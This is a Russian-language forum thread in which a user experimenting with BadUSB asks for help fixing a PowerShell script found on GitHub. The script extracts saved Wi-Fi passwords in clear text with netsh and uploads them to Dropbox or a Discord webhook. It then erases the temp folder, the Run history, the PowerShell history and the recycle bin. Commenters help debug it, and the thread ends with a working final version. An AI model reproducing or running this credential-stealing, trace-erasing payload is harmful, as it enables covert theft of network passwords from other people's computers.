Не могу получить пароли от wifi с помощью powershell
экспериментирую с BadUsb, нашел на гитхабе скрипт:

$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String


$wifiProfiles > $env:TEMP/--wifi-pass.txt

############################################################################################################################################################

# Upload output file to Dropbox

function DropBox-Upload {

[CmdletBinding()]
param (
    
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
) 
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $db
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TEMP/--wifi-pass.txt}

############################################################################################################################################################

function Upload-Discord {

[CmdletBinding()]
param (
    [parameter(Position=0,Mandatory=$False)]
    [string]$file,
    [parameter(Position=1,Mandatory=$False)]
    [string]$text 
)

$hookurl = "$dc"

$Body = @{
  'username' = $env:username
  'content' = $text
}

if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};

if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}

if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:TEMP/--wifi-pass.txt"}

 

############################################################################################################################################################

function Clean-Exfil { 

# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue

# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 

# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue

# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

}

############################################################################################################################################################

if (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}


RI $env:TEMP/--wifi-pass.txt

Но у меня он не заработал, накопал, что это может быть из-за языка который стоит на винде, поменял "Key Content\W+\:(.+)$" на "Содержимое ключа\W+\:(.+)$", не помогло, в чем  может быть проблема, как исправить? Заранее спасибо.

под "не заработал" имею ввиду, что он выдает пустые .txt файлы

попробуйте частями запустить скрипт, сначала посмотрите что вам даст команда если запускать всё что до этого Select-String "Key Content\W+\:(.+)$"

Пробовал, в $name как и должно быть имя сети, дальше параметры самой сети  $name, к примеру       Параметры безопасности
Проверка подлинности: WPA2-Personal
Шифр:                    CCMP
Проверка подлинности: WPA2-Personal
Шифр:                    GCMP
Ключ безопасности:       Присутствует
Содержимое ключа            : мой пароль


Ага, хорошо, вот так дальше по частям и разбирайте, маленькими шажками

дальше как раз Select-String "Key Content\W+\:(.+)$"  которое ничего не выдает

с русским языком ничего не выдаёт? Или вы пытаетесь Key Content писать?

и так и так .txt пустой

причём тут txt? По частям исполняйте, проверяя каждый шаг

проверял эту строчку отдельно и по частям, имя сети я получаю а вот Key Content пустой(вне зависимости от языка), если делать все в ручную то пароли и имена сетей видно

Вы просто ленитесь дебажить? Так понимаю вы исполняете маленький кусочек скрипта, видите что он исполняется корректно, а потом пытаетесь исполнить весь скрипт целиком. А весь скрипт при этом не работает. И вы, вместо того, чтобы проверить маленькие части по отдельности, просите сообщество продебажить за вас. Понимаете проблему?

Итеративно, маленькими шажками, проверяете каждую строчку, каждую функцию.

Подозреваю, что проблема в том, что выполняется всё не в привилегированном режиме, хотя мне не нравится и первая строчка, потому немного подправил её
switch ([CultureInfo]::InstalledUICulture.Name){
    ru-RU {$pattern = "Содержимое ключа\W+\:(.+)$"}
    en-us {$pattern = "Key Content\W+\:(.+)$"}
}

$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{                                                          
     $name = $_.Matches.Groups[1].Value.Trim()
     (netsh wlan show profile $name key=clear) | Select-String $Pattern |%{
     $pass=$_.Matches.Groups[1].Value.Trim()}
    
     [PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass}
     } | Format-Table -AutoSize | Out-String


Попробовал ваш вариант, получаю только имена точек, столбик PASSWORD пустой,  пытался использовать просто (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} выводит всю информацию о точках правильно вместе с содержимым ключа,

так же заметил что если использовать (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} просто в powershell а не в скрипте .ps1, пароли находит и срабатывает как надо

А скрипт запускается в привилегированном режиме?

Да, я открываю Администратор:Windows Powershell и запускаю скрипт просто указав путь к нему

В общем нашел следующую закономерность, под пользователем который администратор на моём компьютере работает и так и эдак.
Если запускать из под другого пользователя, то только в привилегированном режиме.
Быть может добавить пару строк в начало, на проверку привилегированности?
`$IsAdministrator = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
if (!$IsAdministrator){throw "Powershell не запущен в привилегированном режиме, дальнейшее выполнение невозможно"}`

Попробовал совместить все что вы предлагали и вывести Write-Output $wifiProfiles  и так же получаю только                  PROFILE_NAME       PASSWORD

DSL-2650U
893
Redmi Note 8 Pro
Reeeeedmi
AngelsIT
RT-5WiFi-7CA6
sevostei 2
MERCUSYS_4665_5G
MERCUSYS_4665
KINOMAX_FREE
Warpoint_WiFi_Free
TP-LINK_76
CS-Wireless
sevostei
ROSTELECOM_8419

В итоге я решил оставить идею с Select-String "Key Content\W+\:(.+)$", я просто убрал эту часть кода, и теперь получаю .txt со всеми параметрами сетей, а не только Имя сети-пароль.
В том числе в таком .txt есть и Содержимое ключа: сам пароль, просто эту строчку надо найти вручную.
Вот итоговый скрипт:
############################################################################################################################################################

$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Out-String
$dc = "Ваш Discord Webhook"


$wifiProfiles > $env:TEMP/--wifi-pass.txt

############################################################################################################################################################

function Upload-Discord {

[CmdletBinding()]
param (
    [parameter(Position=0,Mandatory=$False)]
    [string]$file,
    [parameter(Position=1,Mandatory=$False)]
    [string]$text 
)

$hookurl = "$dc"

$Body = @{
  'username' = $env:username
  'content' = $text
}

if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};

if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}

if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:TEMP/--wifi-pass.txt"}

 

############################################################################################################################################################

function Clean-Exfil { 

# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue

# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 

# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue

# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

}

############################################################################################################################################################

if (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}


RI $env:TEMP/--wifi-pass.txt

